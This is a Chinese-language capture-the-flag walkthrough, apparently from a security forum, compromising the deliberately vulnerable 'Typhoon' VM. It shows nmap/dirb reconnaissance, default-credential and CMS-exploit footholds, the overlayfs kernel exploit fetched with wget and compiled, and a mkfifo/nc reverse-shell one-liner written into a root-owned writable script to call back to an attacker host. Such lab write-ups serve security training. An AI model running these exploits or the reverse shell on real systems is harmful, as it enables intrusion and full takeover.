靶机下载地址:

靶机渗透难度相对简单,利用方式很多。有兴趣的同学可以自己下载试一试

主机发现

root@Shockwave:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.2.1 cc:81:da:9c:d3:49   (Unknown)
192.168.2.25    a4:38:cc:dc:7e:f2   (Unknown)
192.168.2.121   f0:18:98:04:80:24   (Unknown)
192.168.2.149   00:0c:29:d6:53:2b   VMware, Inc.
192.168.2.149   f0:18:98:04:80:24   (Unknown) (DUP: 2)
192.168.2.171   00:ec:0a:7d:a5:3a   (Unknown)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.427 seconds (105.48 hosts/sec). 6 responded

192.168.2.149发现主机

端口探测

root@Shockwave:~# nmap -A 192.168.2.149
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-08 13:42 EST
Nmap scan report for 192.168.111.168
Host is up (0.00073s latency).
Not shown: 983 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.111.188
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 02:df:b3:1b:01:dc:5e:fd:f9:96:d7:5b:b7:d6:7b:f9 (DSA)
|   2048 de:af:76:27:90:2a:8f:cf:0b:2f:22:f8:42:36:07:dd (RSA)
|   256 70:ae:36:6c:42:7d:ed:1b:c0:40:fc:2d:00:8d:87:11 (ECDSA)
|_  256 bb:ce:f2:98:64:f7:8f:ae:f0:dd:3c:23:3b:a6:0f:61 (ED25519)
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: typhoon, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=typhoon
| Not valid before: 2018-10-22T19:38:20
|_Not valid after:  2028-10-19T19:38:20
|_ssl-date: TLS randomness does not represent time
53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/mongoadmin/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Typhoon Vulnerable VM by PRISMA CSI
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL SASL PIPELINING CAPA STLS AUTH-RESP-CODE TOP
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
|_ssl-date: TLS randomness does not represent time
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      40597/tcp  mountd
|   100005  1,2,3      60536/udp  mountd
|   100021  1,3,4      38498/udp  nlockmgr
|   100021  1,3,4      57277/tcp  nlockmgr
|   100024  1          33465/tcp  status
|   100024  1          42988/udp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: STARTTLS more LOGIN-REFERRALS Pre-login ID LOGINDISABLEDA0001 listed ENABLE post-login OK SASL-IR capabilities have IDLE IMAP4rev1 LITERAL+
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
|_ssl-date: TLS randomness does not represent time
445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
631/tcp  open  ipp         CUPS 1.7
| http-methods: 
|_  Potentially risky methods: PUT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: CUPS/1.7 IPP/2.1
|_http-title: Home - CUPS 1.7.2
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: more LITERAL+ Pre-login ID LOGIN-REFERRALS listed ENABLE post-login OK SASL-IR capabilities have AUTH=PLAINA0001 IDLE IMAP4rev1
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL SASL(PLAIN) PIPELINING CAPA AUTH-RESP-CODE USER TOP
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
|_ssl-date: TLS randomness does not represent time
2049/tcp open  nfs_acl     2-3 (RPC #100227)
3306/tcp open  mysql       MySQL (unauthorized)
5432/tcp open  postgresql  PostgreSQL DB 9.3.3 - 9.3.5
| ssl-cert: Subject: commonName=typhoon
| Not valid before: 2018-10-22T19:38:20
|_Not valid after:  2028-10-19T19:38:20
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:D6:53:2B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts:  typhoon, TYPHOON; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h14m12s, deviation: 1h09m16s, median: -34m13s
|_nbstat: NetBIOS name: TYPHOON, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   Computer name: typhoon
|   NetBIOS computer name: TYPHOON\x00
|   Domain name: local
|   FQDN: typhoon.local
|_  System time: 2018-12-08T20:08:20+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-12-08 13:08:21
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.111.168

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds

发现开放了很多端口的,各种常用的服务ftp/ssh/http/mysql等等都开了,80端口还顺带扫出来个/robots.txt。

目录扫描

root@Shockwave:~# dirb http://192.168.2.149

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Dec 17 10:32:48 2018
URL_BASE: http://192.168.2.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.149/ ----
==> DIRECTORY: http://192.168.2.149/assets/                                    
==> DIRECTORY: http://192.168.2.149/calendar/                                  
+ http://192.168.2.149/cgi-bin/ (CODE:403|SIZE:288)                            
==> DIRECTORY: http://192.168.2.149/cms/                                       
==> DIRECTORY: http://192.168.2.149/drupal/                                    
+ http://192.168.2.149/index.html (CODE:200|SIZE:3529)                         
==> DIRECTORY: http://192.168.2.149/javascript/                                
==> DIRECTORY: http://192.168.2.149/phpmyadmin/                                
+ http://192.168.2.149/robots.txt (CODE:200|SIZE:37)

入侵靶机

PHPMOADMIN

访问/robots.txt,是一个mogondb的WebUI管理,

User-agent: *
Disallow: /mongoadmin/

访问http://192.168.2.149/mongoadmin/

查看版本号。http://192.168.2.149/mongoadmin/index.php?action=getStats

version
mongo: 3.0.15 (64-bit)
mongoPhpDriver: 1.6.16
phpMoAdmin: 1.0.9
php: 5.5.9-1ubuntu4.26 (64-bit)
gitVersion: b8ff507269c382bc100fc52f75f48d54cd42ec3b

3.0.15。Google搜一搜,没想到一搜就是两个RCE的payload(捂脸.jpg)。

顺利getshell。

SSH

回过来看一下数据库里的数据。在credentials表发现了一列账号密码。

尝试SSH登录。

root@Shockwave:~# ssh typhoon@192.168.2.149
The authenticity of host '192.168.2.149 (192.168.2.149)' can't be established.
ECDSA key fingerprint is SHA256:fLv3o4p7wR+3hFFRGmT0UpswxJ2eN6BWXE/aM64mHlo.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.2.149' (ECDSA) to the list of known hosts.
    d888888b db    db d8888b. db   db  .d88b.   .d88b.  d8b   db 
    `~~88~~' `8b  d8' 88  `8D 88   88 .8P  Y8. .8P  Y8. 888o  88 
       88     `8bd8'  88oodD' 88ooo88 88    88 88    88 88V8o 88 
       88       88    88~~~   88~~~88 88    88 88    88 88 V8o88 
       88       88    88      88   88 `8b  d8' `8b  d8' 88  V888 
       YP       YP    88      YP   YP  `Y88P'   `Y88P'  VP   V8P 

                 Vulnerable VM By PRISMA CSI - www.prismacsi.com

WARNING:  Unauthorized access to this system is forbidden and will be
prosecuted by law. By accessing this system, you agree that your actions
may be monitored if unauthorized usage is suspected.

        This is a joke of course :))
        Please hack me!

-----------------------------------------------------------------------
typhoon@192.168.2.149's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Dec 18 00:08:11 EET 2018

  System load: 0.08               Memory usage: 3%   Processes:       385
  Usage of /:  41.8% of 17.34GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Mon Dec 10 12:23:58 2018 from 192.168.7.41
typhoon@typhoon:~$ whoami
typhoon
typhoon@typhoon:~$ sudo -i
[sudo] password for typhoon: 
typhoon is not in the sudoers file.  This incident will be reported.

登陆成功,但是typhoon用户并没有超级用户权限。

Tomcat Manager

访问8080端口,登录manager webapp。尝试默认用户名和密码tomcat登录。

登录成功,上msf。

Drupal CMS & Lotus CMS

http://192.168.2.149/drupal/

http://192.168.2.149/cms/

这两个CMS都是有问题的版本,就直接用msf的payload打了。

其他

另外还可以通过/dvwa//xvwa/的命令注入练习getshell,系统都是默认账号和密码。

dvwa的是admin/password,xvwa的是admin/admin。

也可以登录/phpmyadmin/后台,通过包含日志的方式getshell,登录密码为默认的toor(也可以通过泄露的/dvwa/config/config.inc.php.bak备份文件查看密码)。

具体方式不再展开说了,有兴趣的同学可以自己尝试一下。

提权过程

利用内核

查看系统版本、内核信息:

typhoon@typhoon:~$ uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
typhoon@typhoon:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.1 LTS
Release:    14.04
Codename:   trusty

系统是Ubuntu14.04,内核版本为3.13.0,searchsploit搜一下相关漏洞。

对应的系统、内核刚好有一个利用overlayfs的exploit,下下来放到靶机上。

# 复制exploit到当前目录
root@Shockwave:~/exploits# searchsploit -m 37292.c
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292/
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines, with CRLF line terminators

Copied to: /root/exploits/37292.c

# 搭建文件服务器到,映射到80端口
root@Shockwave:~/exploits# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
# 靶机下载文件
typhoon@typhoon:~$ wget 192.168.92.104/37292.c
--2018-12-18 11:29:56--  http://192.168.92.104/37292.c
Connecting to 192.168.92.104:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: ‘37292.c’

100%[==============================================================================================================>] 5,119       --.-K/s   in 0s      

2018-12-18 11:29:56 (362 MB/s) - ‘37292.c’ saved [5119/5119]

编译、赋权、运行一条龙。

typhoon@typhoon:~$ gcc 37292.c -o exploit
typhoon@typhoon:~$ chmod a+x exploit 
typhoon@typhoon:~$ ./exploit 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),112(sambashare),125(libvirtd),1000(typhoon)
# whoami
root
# cat /root/root-flag
<Congrats!>

Typhoon_r00t3r!

</Congrats!>
#

可以看到顺利提权成功。通过内核提取最方便、快捷,但是局限性也很大。

利用可写文件

翻查目录文件,在/tab/目录下发现一个文件所有者为root、权限为777的sh文件。

typhoon@typhoon:/tab$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Dec 17 16:48 .
drwxr-xr-x 25 root root 4096 Oct 24 04:59 ..
-rwxrwxrwx  1 root root   71 Dec 17 16:48 script.sh
typhoon@typhoon:/tab$ cat script.sh 
echo "Typhoon is UP!"

#<typh00n!> P0st_3xpl01t3R_flaqGq <typhoon!>

用低权限用户将构造的命令写入script.sh,令文件调用以root身份运行的/bin/sh,然后反弹shell,就可以获得root权限了。

写入反弹shell命令到script.sh中并执行。

typhoon@typhoon:/tab$ echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.92.104 8888 >/tmp/f" > script.sh 
typhoon@typhoon:/tab$ ./script.sh

在服务器上开启监听,接收到shell。

root@Shockwave:~/exploits# nc -lvvp 8888
listening on [any] 8888 ...

192.168.92.121: inverse host lookup failed: Unknown host
connect to [192.168.92.104] from (UNKNOWN) [192.168.92.121] 58239
/bin/sh: 0: can't access tty; job control turned off
# # 
# ls
root-flag
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# ls
root-flag
# cat root-flag
<Congrats!>

Typhoon_r00t3r!

</Congrats!>

至此提权成功,利用完成。

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖